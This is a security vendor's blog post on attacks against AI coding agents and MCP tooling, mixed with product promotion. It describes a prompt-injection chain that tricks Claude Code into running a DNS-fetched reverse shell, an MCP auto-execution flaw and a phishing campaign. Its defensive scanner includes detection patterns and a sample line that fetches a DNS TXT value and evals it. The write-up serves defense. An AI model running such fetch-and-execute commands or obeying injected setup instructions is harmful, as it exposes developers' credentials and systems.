AI Agents Are the New Attack Surface

by Patrick Spencer | updated June 30, 2026 | Cybersecurity Risk Management

Security researchers just demonstrated that your AI coding assistant can be turned into an exfiltration tool – and your existing detection controls won’t catch it. Not as a theoretical concern. As a documented, reproducible technique, published by Mozilla’s 0Din team in a detailed proof of concept on June 29, 2026.

That disclosure landed in the same week as a high-severity CVE in Amazon Q Developer, a formal analysis of the new enterprise MCP specification, a documented social engineering campaign targeting cybersecurity teams through fake AI workspaces, and an analysis arguing that traditional identity governance is structurally incapable of containing AI agents. Five separate research threads, published within four days of each other, all pointing at the same structural failure: AI agents operating without a governed content layer become exfiltration pathways.

The problem isn’t incremental. Enterprises have spent two decades building security controls around a relatively stable model of what an identity is and how it behaves. An agent doesn’t fit that model. It authenticates once, inherits permissions from the human identity it operates on behalf of, and then traverses multiple enterprise systems in a single session – touching resources no human ever explicitly authorized it to access, leaving fragmented logs that no existing security tool assembles into a coherent picture. This week’s research makes that structural problem concrete, and in one case, time-bound: the July 28 publication date for MCP 2026-07-28 creates a defined window for organizations to address a governance gap before the new protocol’s attack surface comes into full effect.

Kiteworks secure data exchange is designed for exactly this problem. When AI agents access enterprise content through Kiteworks’ governed API layer, every interaction is policy-enforced, every data access is logged, and no agent – legitimate or compromised – can reach content outside its explicitly authorized scope. What the research this week collectively describes is an environment where that governance layer is absent. Across every attack vector documented, the outcome is the same: sensitive enterprise data flows to unauthorized parties through an AI system that had no enforced access boundary.

Key Takeaways

1. AI coding agents can be turned into exfiltration tools through indirect prompt injection.

Mozilla’s 0Din team demonstrated that Claude Code can be hijacked via a poisoned DNS TXT record tied to a normal-looking GitHub repository, spawning a reverse shell that silently exfiltrates API keys, tokens, and environment secrets without triggering any of the agent’s built-in security layers.

2. Amazon Q Developer carried a high-severity flaw that handed attackers cloud credentials.

CVE-2026-12957 (CVSS 8.5), disclosed by Wiz, let malicious MCP configuration files embedded in a code repository execute automatically when a developer opened it, giving attacker-controlled servers access to cloud credentials, local files, and shell execution without any user prompt or visible warning.

3. The new MCP 2026-07-28 specification shifts all security responsibility to developers.

The protocol’s move to a stateless design delegates cross-tenant access controls, secrets management, and privilege escalation checks entirely to individual implementers – with no enforcement at the protocol layer. The specification publishes July 28, beginning a 12-month deprecation window.

4. Attackers are building convincing fake AI workspaces to harvest enterprise data.

Push Security documented the “Poisoned Tenant” campaign, in which threat actors create fraudulent OpenAI organizations targeting cybersecurity employees by name, sending invitations from OpenAI’s legitimate notification address that pass all email authentication checks.

5. Traditional identity governance was not built for agents operating at machine speed.

Analysis of the emerging “guardian agent” model shows that IAM infrastructure built around human authentication events cannot contain autonomous agents that inherit overprivileged credentials, traverse multiple enterprise systems in a single session, and leave no coherent audit trail.

The Claude Code Attack: Three Indirection Steps, One Reverse Shell

The Mozilla 0Din attack works because it distributes its components across three systems that are never examined together. The repository contains no malicious instructions or code. When a developer clones it, Claude Code follows legitimate installation steps. The attack triggers during first-time setup, when Claude Code is instructed to use a Python package that throws an error if called before initialization.

The error message says: “Run: python3 -m axiom init.” Claude Code reads the error and runs the recovery command. Running init calls a shell script that pulls a configuration value from a DNS TXT record and executes it as a command. That value is base64-encoded, so no reverse shell signature ever appears in plaintext on disk or in transit. The interactive shell spawns on the developer’s machine. The attacker gains access to every credential, API key, token, and environment secret loaded there, and can deploy a backdoor for persistent access after the shell closes.

As the Mozilla researchers put it: “The reverse shell is three indirection steps away from anything Claude Code actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw.” Static analysis sees a DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorized setup step. None of the three looks malicious in isolation. The attacker can update the payload at any time by changing the DNS TXT record – no repository changes required – and every developer who opens the repository with Claude Code is exposed.
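The point that each step looks benign in isolation suggests checking for the combination instead. The following is a minimal defensive sketch, assuming setup scripts can be read as text before an agent runs them. The regular expressions and the `flag_setup_script` name are illustrative assumptions, not part of the 0Din research or of any Claude Code feature, and a determined attacker can evade simple pattern matching.

```python
import re

# Heuristic patterns. These are assumptions for illustration, not an
# exhaustive or authoritative rule set.
DNS_TXT_LOOKUP = re.compile(r"\b(dig|nslookup|host)\b[^\n]*\btxt\b", re.IGNORECASE)
BASE64_DECODE = re.compile(r"\bbase64\s+(-d|--decode|-D)\b")
DYNAMIC_EXEC = re.compile(r"\beval\b|\|\s*(ba|z)?sh\b|\b(ba)?sh\s+-c\b")


def flag_setup_script(script_text: str) -> list[str]:
    """Return labels for risky combinations found in a shell script.

    A DNS TXT lookup or a base64 decode alone is common and usually benign;
    only the combination with dynamic execution is reported.
    """
    has_dns = bool(DNS_TXT_LOOKUP.search(script_text))
    has_b64 = bool(BASE64_DECODE.search(script_text))
    has_exec = bool(DYNAMIC_EXEC.search(script_text))

    findings = []
    if has_dns and has_exec:
        findings.append("dns-txt-to-exec")
    if has_b64 and has_exec:
        findings.append("base64-to-exec")
    return findings


if __name__ == "__main__":
    # Hypothetical script shaped like the chain described above.
    sample = (
        "VALUE=$(dig +short TXT cfg.example.invalid | tr -d '\"')\n"
        "eval \"$(echo \"$VALUE\" | base64 -d)\"\n"
    )
    print(flag_setup_script(sample))
```

A check like this only covers scripts present in the repository at scan time. It cannot see the payload itself, which lives in the DNS record and can change after the scan.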

This bypasses all three of Claude Code’s built-in security layers. That’s not a criticism of Claude Code specifically; it’s a structural characteristic of any AI coding agent that treats error messages as legitimate instructions. The payload delivery mechanism – DNS TXT records – sits outside the agent’s threat model entirely. Any developer using an AI coding agent to set up an unfamiliar repository is operating with a significantly expanded attack surface, one that no existing endpoint or network control reliably covers. Sound AI data protection requires modeling how agents interact with environmental data – not just the content they are explicitly asked to process.

Amazon Q and the Auto-Execution Problem

The Amazon Q Developer vulnerability disclosed by Wiz on June 26, 2026 (CVE-2026-12957, CVSS 8.5) describes the same structural failure from a different angle. The root cause: the extension automatically acted on MCP configuration files embedded in a workspace without asking the user for permission. A developer opened a repository. The repository contained a malicious MCP configuration file. The extension executed it silently, granting an attacker-controlled MCP server access to local files, cloud credentials, and shell execution – no user prompt, no warning, no visible indication that anything unusual had occurred.

AWS was notified April 20, issued a patch on May 12, and published an advisory this week. Fixes are available across VS Code, JetBrains, Eclipse, Visual Studio, and the Amazon Q language server. Wiz notes that the underlying auto-execution pattern is not unique to Amazon Q – similar behaviors have been identified in other AI coding tools including Claude and Cursor. The specific attack vectors Wiz identifies: fake coding tests (a technique associated with North Korean threat actors who target developers), typosquatted open source packages, and malicious pull requests to popular open source projects.

The developer doesn’t have to make a mistake. They have to do exactly what they would normally do with any repository. When a configuration file executes automatically because an agent opened it, there is no policy evaluation happening at the content layer – only execution. The attack exploits the absence of a data policy engine: a control that evaluates content against policy before an agent acts on it. “The combination of auto-execution, shell spawning, and environment inheritance created a high-severity vulnerability in a widely-used developer tool,” Wiz wrote. “A single malicious repository could compromise not just the developer’s local machine, but their cloud infrastructure as well.”
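One way to reintroduce a review step is to list any MCP server definitions a repository ships before opening it in an AI coding tool. The sketch below assumes a handful of workspace-level config locations and the `mcpServers` / `servers` JSON keys. Those paths and keys are assumptions that vary by tool and version, so the list should be checked against each vendor's documentation. The `find_mcp_servers` helper is hypothetical.

```python
import json
from pathlib import Path

# Assumed workspace-level MCP config locations. Not exhaustive; verify
# against the documentation for the tools actually in use.
CANDIDATE_PATHS = (
    ".mcp.json",
    ".vscode/mcp.json",
    ".cursor/mcp.json",
    ".amazonq/mcp.json",
)


def find_mcp_servers(repo_root: str) -> list[dict]:
    """List MCP server entries declared inside a checked-out repository."""
    root = Path(repo_root)
    findings = []
    for rel in CANDIDATE_PATHS:
        path = root / rel
        if not path.is_file():
            continue
        try:
            config = json.loads(path.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, UnicodeDecodeError):
            # An unreadable config is still worth a human look.
            findings.append({"file": rel, "server": "<unparseable>",
                             "command": None, "url": None})
            continue
        if not isinstance(config, dict):
            continue
        servers = config.get("mcpServers") or config.get("servers") or {}
        if not isinstance(servers, dict):
            continue
        for name, entry in servers.items():
            entry = entry if isinstance(entry, dict) else {}
            args = entry.get("args") if isinstance(entry.get("args"), list) else []
            parts = [entry.get("command"), *args]
            findings.append({
                "file": rel,
                "server": name,
                # The command line the tool would spawn, if any.
                "command": " ".join(str(p) for p in parts if p) or None,
                "url": entry.get("url"),
            })
    return findings


if __name__ == "__main__":
    for finding in find_mcp_servers("."):
        print(finding)
```

Running this in a freshly cloned repository and reviewing any output before opening the workspace restores the prompt that the vulnerable extension skipped. It does not replace applying the vendor patch.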

The MCP 2026-07-28 Specification Gap

On July 28, 2026, MCP 2026-07-28 will be officially published, beginning a 12-month deprecation window for the current version. The headline change is that MCP is now stateless at the protocol layer. That shift enables enterprise-scale, cloud-native deployments. It also means something specific for security teams: the session-layer security guarantees the current protocol provides are gone in the new version.

Akamai’s analysis of the release candidate identifies several new attack surface areas introduced by the stateless design. Workflow hijacking and cross-tenant access become viable if tracking identifiers are predictable. New MCP-specific HTTP headers (MCP-Method and MCP-Name) create data leakage vectors – if developers inadvertently map sensitive inputs such as API keys, tokens, or PII to those headers, those secrets become visible to every load balancer, proxy, and logging system along the request path. MCP Apps as a first-class protocol extension introduces stored XSS risks. Long-running asynchronous tasks create a denial-of-service vector where task creation is cheap for an attacker but resource-intensive for the server.
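Two of these risks, secrets leaking through the new headers and predictable tracking identifiers, can be reduced with small guards at the application layer. The sketch below assumes a client that builds the `MCP-Method` and `MCP-Name` headers itself. The function names and the secret-detection patterns are illustrative assumptions, not part of the MCP specification or of Akamai's analysis, and pattern matching will miss many secret formats.

```python
import re
import secrets

# Illustrative patterns only. Real deployments would likely use a
# dedicated secret scanner with a much broader rule set.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "bearer_token": re.compile(r"(?i)\bbearer\s+\S+"),
    "jwt": re.compile(r"\beyJ[\w-]+\.[\w-]+\.[\w-]+"),
    "email_address": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
}


def check_header_value(value: str) -> list[str]:
    """Return the names of any secret-like patterns found in a header value."""
    return [name for name, pattern in SECRET_PATTERNS.items()
            if pattern.search(value)]


def build_mcp_headers(method: str, name: str) -> dict[str, str]:
    """Build the two MCP headers, refusing values that look sensitive.

    Header values are visible to every proxy and log along the request
    path, so they should carry routing metadata only.
    """
    for header, value in (("MCP-Method", method), ("MCP-Name", name)):
        hits = check_header_value(value)
        if hits:
            raise ValueError(f"{header} looks like it contains: {', '.join(hits)}")
    return {"MCP-Method": method, "MCP-Name": name}


def new_tracking_id() -> str:
    """Generate an unguessable identifier from the OS CSPRNG."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    print(build_mcp_headers("tools/call", "search_docs"))
    print(new_tracking_id())
```

Using `secrets.token_urlsafe` instead of a counter or timestamp addresses only the predictability concern. Binding each identifier to a tenant and authorizing it on every request still has to happen server-side.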

Akamai’s conclusion is direct: “The changes are not simply incremental improvements. They fundamentally reshape where security responsibilities reside.” Decisions the current protocol enforces at the session layer are, in the new version, delegated entirely to individual developers and platform operators. Maxim Zavodchik, Akamai’s senior director of threat research, told SecurityWeek: “Since the protocol is transitioning to a stateless model and introducing rich UI apps and asynchronous tasks, critical security boundaries are now entirely dependent on how developers implement them.”

For organizations running AI agents over enterprise content, this is the governance gap that matters most right now. The new protocol won’t enforce data governance, data classification, or access controls. It won’t log what content an agent retrieved. Every one of those security properties has to be implemented at the application layer, by the developer or the platform operator. The July 28 deadline is an inflection point with a defined timeline: organizations have a bounded window to get a governed content layer in place before the new protocol’s attack surface goes live. Kiteworks’ Secure MCP Server provides that governance layer at the AI integration point – the policy enforcement that MCP 2026-07-28 deliberately does not include in the protocol itself.

The Poisoned Tenant: Social Engineering for the AI Era

The “Poisoned Tenant” campaign documented by Push Security takes a different approach to the same objective. Rather than compromising an AI agent through a technical exploit, it creates a fake AI workspace – a fraudulent OpenAI organization impersonating a legitimate company – and invites target employees to join it. The invitation emails come from noreply@tm.openai.com, OpenAI’s actual notification address. They pass all email authentication checks. From a technical standpoint, they are genuine invitations from OpenAI. The only fraudulent element is the organization the user is invited to join.

Push Security discovered the campaign after multiple employees received invitations to join an OpenAI organization named “Push Security Inc.” – created by an attacker using Gmail accounts, not by Push Security. After accepting one invitation to study the attack, Luke Jennings, VP of Research and Development at Push Security, found himself added to the fraudulent organization, which contained a single attacker-controlled account presenting as the company’s CEO. Invited employees had been assigned Owner privileges. A Visa credit card was attached to the billing account to add legitimacy. The project contained no existing chats – only infrastructure to collect whatever sensitive content employees would submit.

Push Security’s read on the campaign’s objective is sharp: “An attacker who just wants to spray scam content through a trusted email channel doesn’t name the organization after their target, research individual employees, or attach a credit card. That investment only pays off if employees actually join the organization and start using it. And on an AI platform, the data people put into prompts can be extraordinarily sensitive – source code, internal documents, customer data, security research, strategic plans.” Phishing has expanded to include AI platforms as the collection infrastructure. Attackers aren’t just after credentials. They’re constructing environments where targets willingly submit the most sensitive content they work with. The intellectual property exposure here is severe: source code and strategic plans submitted to a fraudulent workspace represent a direct loss of intellectual property with no clear path to remediation once the data has left the organization’s control.

Security awareness training is necessary but not sufficient here. The governance question is whether enterprise AI access is channeled through a controlled environment where what goes in and what comes out is visible to the security team – and where the platform itself is under organizational control, not borrowed from a third-party provider without oversight.

Guardian Agents and the Identity Governance Gap

An analysis published by The Hacker News on June 26 describes the “guardian agent” model – AI systems deployed to audit, govern, and terminate other AI agents. The argument is structural: traditional IAM was built around authentication events. A human presents credentials, access is granted or denied, and the session is recorded. Agents don’t follow that sequence.

An agent authenticates once, typically via a long-lived token or API credential, and then operates continuously across sessions, systems, and contexts without an intervening governance checkpoint. When an agent executes on behalf of a sales director, it carries that person’s OAuth tokens, their delegated permissions, and any overprivileged access accumulated over years of role changes. The agent doesn’t distinguish between what the human would have done and what it’s been instructed to do. It executes with full inherited authority across every application that identity can reach – CRM systems, code repositories, document stores, internal APIs – all in a single session, all through credentials originally scoped for a human user working in a completely different context.

What this creates, in environments without dedicated agent governance, is what the analysis calls “identity dark matter”: identity activity that exists and exerts real risk inside an environment while remaining invisible to the tools responsible for governing it. Agents don’t go through access request workflows. They don’t get onboarded into identity governance systems. They inherit credentials from existing identities and start executing. The result is a growing population of autonomous identities operating with no formal governance record, no ownership mapping, and no behavioral baseline. Zero trust architecture requires continuous verification of every entity – but verification requires visibility, and most organizations have no visibility into what their AI agents are doing after they authenticate. Attribute-based access control (ABAC) is the technical mechanism that makes continuous verification operational: access decisions evaluate agent identity, content sensitivity, and execution context at every request, rather than relying on a single authentication event to authorize an entire session.
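A per-request ABAC decision of the kind described above can be sketched in a few lines. The attribute names, sensitivity levels, and rules here are hypothetical choices for illustration. They do not describe any specific product's policy model.

```python
from dataclasses import dataclass

# Hypothetical sensitivity ladder; higher rank means more sensitive.
SENSITIVITY_RANK = {"public": 0, "internal": 1, "confidential": 2, "restricted": 3}


@dataclass(frozen=True)
class AccessRequest:
    agent_id: str
    agent_clearance: str          # highest sensitivity this agent may touch
    task_scope: frozenset[str]    # collections the current task actually needs
    resource_collection: str
    resource_sensitivity: str
    action: str                   # e.g. "read" or "write"


def decide(request: AccessRequest) -> tuple[bool, str]:
    """Evaluate one request against agent, content, and context attributes.

    Called on every access, so a single authentication event never
    authorizes a whole session.
    """
    if request.resource_collection not in request.task_scope:
        return False, "resource is outside the current task scope"
    resource_rank = SENSITIVITY_RANK[request.resource_sensitivity]
    if resource_rank > SENSITIVITY_RANK[request.agent_clearance]:
        return False, "resource sensitivity exceeds agent clearance"
    if request.action != "read" and request.resource_sensitivity == "restricted":
        return False, "restricted content is read-only for agents"
    return True, "allowed"


if __name__ == "__main__":
    request = AccessRequest(
        agent_id="agent-7",
        agent_clearance="internal",
        task_scope=frozenset({"sales-crm"}),
        resource_collection="code-repos",
        resource_sensitivity="internal",
        action="read",
    )
    print(decide(request))
```

The design choice that matters is the first check: scope comes from the task at hand rather than from the full permission set of the human the agent acts for, which is what keeps inherited overprivilege from carrying over.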

Guardian agents address this by operating at the execution layer rather than the authentication boundary. They maintain continuous identity inventory, behavioral baselines, and runtime least-privilege enforcement – the governance layer that conventional IAM tools weren’t built to deliver. The analogy to governed content exchange is direct: moving the security enforcement point to where permissions are actually exercised, so that access controls apply based on what the agent is doing right now, not what it was originally provisioned to do months ago.

The Common Thread: No Enforced Content Boundary

Five disclosures, four days, one structural failure. The Claude Code attack, the Amazon Q vulnerability, the MCP specification gap, the Poisoned Tenant campaign, and the guardian agent analysis all point to enterprises that have deployed AI agents with meaningful capabilities and no enforced content governance layer.

The Kiteworks 2026 Data Security and Compliance Risk: Annual Forecast Report documented how AI-related risks were becoming the primary concern across enterprise security programs – with a persistent gap between how fast organizations were deploying AI and how much governance infrastructure they were building around it. The research this week shows what that gap looks like from an attacker’s perspective. Whether the vector is a poisoned DNS record, a malicious MCP configuration file, a fraudulent AI workspace invitation, or an ungoverned agent operating with inherited overprivileged credentials – the outcome is the same: sensitive enterprise data flows to unauthorized parties through an AI system that had no enforced access boundary. Any of these attack paths, if it exposed regulated data, could constitute a reportable data breach under HIPAA, GDPR, or comparable frameworks, so the compliance exposure compounds the security exposure.

Kiteworks Compliant AI addresses that gap at the data layer. When enterprise AI operates through Kiteworks’ governed environment, every agent interaction is subject to policy enforcement, every data access is logged with a full audit trail, and no agent – regardless of what credentials it carries or what instructions it has received – can reach content outside its explicitly authorized scope. DLP and data classification capabilities apply at the API layer, not after the fact. The July 28 MCP specification deadline makes this more urgent than a general best practice: the new protocol explicitly delegates content governance to the application layer, and organizations that don’t have that layer in place before July 28 are running agents into an environment the protocol won’t protect.

The CISO Dashboard gives security leaders the visibility to understand what enterprise AI is accessing, when, and by whom. In the environment this week’s research describes, that visibility isn’t optional. It’s the prerequisite for any meaningful governance of AI agent behavior. Organizations conducting a formal risk assessment of their AI agent deployments should treat the absence of a governed content layer as the single highest-priority finding – every other control assumes that layer exists.

To learn more about governing AI agent data access in regulated environments, schedule a custom demo today.

Frequently Asked Questions

The Mozilla 0Din attack demonstrates that built-in security controls can be bypassed when an attack is carefully split across systems the agent never examines together. In the documented technique, the malicious payload lives in a DNS TXT record – not in the repository, not in any file the agent reads directly. The agent follows a legitimate error message pointing to a legitimate recovery command. That command calls a script that performs a DNS lookup. The agent never sees the payload; it sees a sequence of steps that each look authorized. Because the attack exploits the agent’s trust in error messages as instructions rather than any content vulnerability, standard controls that scan repository content miss it entirely. Organizations working to understand this threat should examine how AI data protection policies apply to the AI coding tools developers use – not just the content those tools are asked to process. The zero trust generative AI principle of never trusting environmental inputs without verification applies directly here. A documented incident response plan that explicitly covers AI coding agent compromise scenarios gives security teams a defined escalation path when this class of attack is detected.

The patch addresses CVE-2026-12957 specifically, but Wiz notes that the underlying auto-execution pattern – MCP configuration files executing without user permission when a workspace is opened – is not unique to Amazon Q. Similar behaviors have been identified in other AI coding tools. Any organization running AI coding assistants should audit whether those tools exhibit comparable auto-execution behaviors. More broadly, the incident illustrates that third-party risk management now extends to the AI tools developers use, not just the software they build. A repository shared across teams or sourced externally carries a new class of risk when AI coding agents are active in the development environment. Vendor risk management programs should include the AI tooling layer as a distinct risk category – not just the third-party code those tools help produce. Extending supply chain risk management practices to cover AI development tooling closes a gap that traditional software supply chain reviews – focused on dependencies and packages – typically miss.

Start with an inventory: every AI agent deployment using MCP connections, what content those agents can access, and on whose authority. The new specification’s stateless design means cross-tenant access controls, secrets management, and privilege escalation protections are not enforced at the protocol layer. They have to be implemented by whoever builds and operates the MCP server. Data governance policies specifying what content an agent can access, under what conditions, and with what logging need to be in place before July 28 – not after. For organizations that have deployed AI agents over regulated data – PHI, financial records, defense-related information – the specification change is a compliance event, not just a security one. Kiteworks’ Secure MCP Server enforces governance boundaries at the AI integration layer regardless of what the protocol provides, making it a practical solution for organizations that cannot wait for the broader developer ecosystem to catch up. Feeding agent access logs into a SIEM platform from day one gives security teams the real-time anomaly detection capability that the new stateless protocol does not provide natively.
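Because the protocol itself will not record what an agent retrieved, the logging has to be produced by the application. A minimal sketch of a structured access event suitable for forwarding to a SIEM follows. The field names and the `agent_access` logger name are assumptions, and how the resulting lines reach a particular SIEM depends on that platform's ingestion method.

```python
import json
import logging
from datetime import datetime, timezone

logger = logging.getLogger("agent_access")  # hypothetical logger name


def build_access_event(agent_id: str, on_behalf_of: str, resource: str,
                       action: str, decision: str) -> dict:
    """Assemble one access record answering: who, for whom, what, and outcome."""
    return {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "event_type": "agent_content_access",
        "agent_id": agent_id,
        "on_behalf_of": on_behalf_of,
        "resource": resource,
        "action": action,
        "decision": decision,
    }


def emit_access_event(event: dict) -> str:
    """Serialize the event as one JSON line and hand it to the logger."""
    line = json.dumps(event, sort_keys=True)
    logger.info(line)
    return line


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO, format="%(message)s")
    emit_access_event(build_access_event(
        agent_id="agent-7",
        on_behalf_of="sales.director@example.invalid",
        resource="sales-crm/accounts/1234",
        action="read",
        decision="allowed",
    ))
```

Logging denied requests as well as allowed ones gives the behavioral baseline that anomaly detection needs, since an agent probing outside its scope shows up only in the denials.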

Conventional phishing tricks users into clicking a malicious link or submitting credentials to a fake site. The Poisoned Tenant campaign uses legitimate platform infrastructure: the invitation is real, the email is from OpenAI’s actual notification address, it passes all email authentication checks, and the platform is a genuine OpenAI service. What’s fraudulent is only the organization the user is invited to join. Email security controls that scan for malicious links or spoofed senders won’t catch this because there’s nothing technically malicious to flag. Push Security recommends training employees to verify unexpected organization invitations and monitoring SaaS organization memberships – but this also points to a broader architectural need. Enterprise AI access should flow through controlled environments where the security team can see what employees are submitting. Secure collaboration platforms with policy enforcement and audit logs provide visibility that a standard ChatGPT workspace doesn’t – and that visibility is the difference between knowing an exfiltration event happened and learning about it from an attacker. Enforcing MFA on every SaaS organization membership action, not just primary account logins, would have flagged the Owner-privilege grant in this campaign before sensitive content was ever submitted.

A guardian agent is a control layer that governs the identity and behavior of AI agents operating in an enterprise environment. Where conventional IAM tools govern access at the authentication boundary, a guardian agent operates at the execution layer – maintaining continuous inventory of every autonomous identity, building behavioral baselines, and enforcing runtime least-privilege policies against what agents actually do across tool calls, data accesses, and cross-system movements. The concept is gaining production adoption. Its practical prerequisite is zero trust data exchange thinking applied to agent identities: every agent interaction must be verified, not just authenticated. The June 26 analysis notes that this requires a control plane built for the execution layer – existing IAM, PAM, and CIEM tools weren’t designed to follow an agent through a multi-system session and enforce policy at each step. AI data governance programs that treat AI agents as governed identities with defined content access boundaries are the organizational prerequisite for making guardian agent controls effective in practice. Data minimization applied to agent credential scope – ensuring an agent inherits only the access its specific task requires, rather than the full permission set of the human identity it operates on behalf of – is the most direct way to limit the blast radius before guardian agent tooling matures further.
